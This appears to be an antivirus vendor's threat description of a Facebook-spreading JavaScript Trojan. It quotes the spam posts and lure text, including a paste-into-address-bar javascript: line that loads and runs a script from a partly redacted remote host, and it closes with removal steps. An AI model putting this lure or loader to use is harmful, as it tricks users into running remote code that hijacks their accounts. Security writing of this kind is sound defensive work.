JS_OBFUS.SMHB
Windows 2000, Windows XP, Windows Server 2003
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
This malicious script posts spam messages on Facebook.
It may also create an event with certain instructions. Doing the instructions may download and execute a similar JavaScript also detected as JS_OBFUS.SMHB.
This Trojan may arrive bundled with malware packages as a malware component. It may be hosted on a website and run when a user accesses the said website.
TECHNICAL DETAILS
7,824 bytes
JS
27 May 2011
Displays windows
Arrival Details
This Trojan may arrive bundled with malware packages as a malware component.
It may be hosted on a website and run when a user accesses the said website.
NOTES:
This malicious script posts spam messages on Facebook such as:
"guys i just found an exploit for getting 500 free facebook credits :))"
"oomg i forgot to post the link, here it is http://3x2f6.sdam23.info//?f3jhq"
"wow just got my new facebook digit number, go activate yours and call me! :))
{BLOCKED}by.{BLOCKED}o5.info//?f2l3w
It may also create an event with the following message:
"Hey Guys, Facebook is now giving out (beta) phone numbers for their users. I just got mine :)
To get yours
Just follow these 3 steps:
Copy the following javascript code (highlight and press CTRL-C):
javascript:(activation=(facebookdigits=document).createElement('script').src='//{BLOCKED}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0)
2. Delete the actual address from the url field in your browser and paste the code instead.
3. Press Enter and wait for a bit, it can take up to a minute to complete.
That's it! Your account should now appear with 500 credits.
If you are having trouble with these instructions, try viewing the instructions here:
http://{BLOCKED}5u.dfds33.info/
it's where I learned it"
When the user clicks the URL, it shows the following page:
Doing the instructions may download and execute a similar JavaScript also detected as JS_OBFUS.SMHB.
SOLUTION
8.900
Step 1
For Windows XP and Windows Server 2003 users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2
Close all opened browser windows
Step 3
Scan your computer with your Trend Micro product to delete files detected as JS_OBFUS.SMHB. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Did this description help? Tell us how we did.